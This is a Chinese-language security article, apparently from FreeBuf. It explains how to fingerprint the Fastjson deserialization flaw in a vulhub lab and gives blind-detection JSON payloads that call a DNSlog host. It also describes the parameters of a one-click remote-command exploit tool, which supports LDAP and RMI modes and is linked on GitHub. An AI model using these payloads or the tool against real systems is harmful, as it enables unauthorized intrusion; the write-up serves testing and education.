freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Fastjson批量检查及一键利用工具
2020-07-26 11:04:00

0x01 序章

上次讲解过手动利用fastjson,但讲的过于太简单了。根据大家的反应,收集如下几个问题。

1、如何盲打fastjson

2、判断fastjson的指纹

3、各版本payload以及使用ldap模式监听。

下面我就一一解答,我只是把我在网上查到的资料消化 后分享给大家,如果有大佬觉得哪里不对,还望不吝赐教。这次还带来了一键利用及检测工具,链接在文末。

注:本文仅用于技术讨论与研究,严禁用于任何违法用途,违者后果自负

0x02 环境搭建

这个不用多说了吧,使用vulhub搭建。

启动fastjson:1.2.24或者fastjson:1.2.45都可以。

判断fastjson:

无特殊配置情况下fastjson,无正确的闭合会报错,返回结果里有fastjson字样。

1595340535.png!small

从上图可以看出,我们使用了一个花括号,fastjson处理json时会返回报错信息。

有的小伙伴就问了,如果是配置了不返回报错信息怎么办?那这种情况就只有利用dnslog盲打了。

1595340536.png!small1595340537.png!small

这里有个小技巧就是,如果你批量检查或者自己的dnslog,里面有很多记录。你可以这样使用'baidu'.d1flzs.dnslog.cn,在dnslog前面加个名称

盲打payload:

1.2.67版本前

{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}

1.2.67版本后payload

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

0x03 工具使用

下面讲解工具使用,这是通过GitHub上大佬工具改造的。

支持rmi及ldap两种模式

参数介绍:

  -h, --help               //查看帮助

  -u, --url                  //漏洞url

  -c, --commamd     //执行命令

  -m, --mode           //选择执行模式(可选),1:ldap模式(默认);2:rmi模式

演示效果(dnslog):

1595340631.png!small

1595340538.png!small

演示效果(创建文件):

1595340539.png!small1595340540.png!small

0x04 批量检测

1595340540.png!small

工具链接:

https://github.com/mrknow001/fastjson_rec_exploit

# 工具 # Fastjson
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录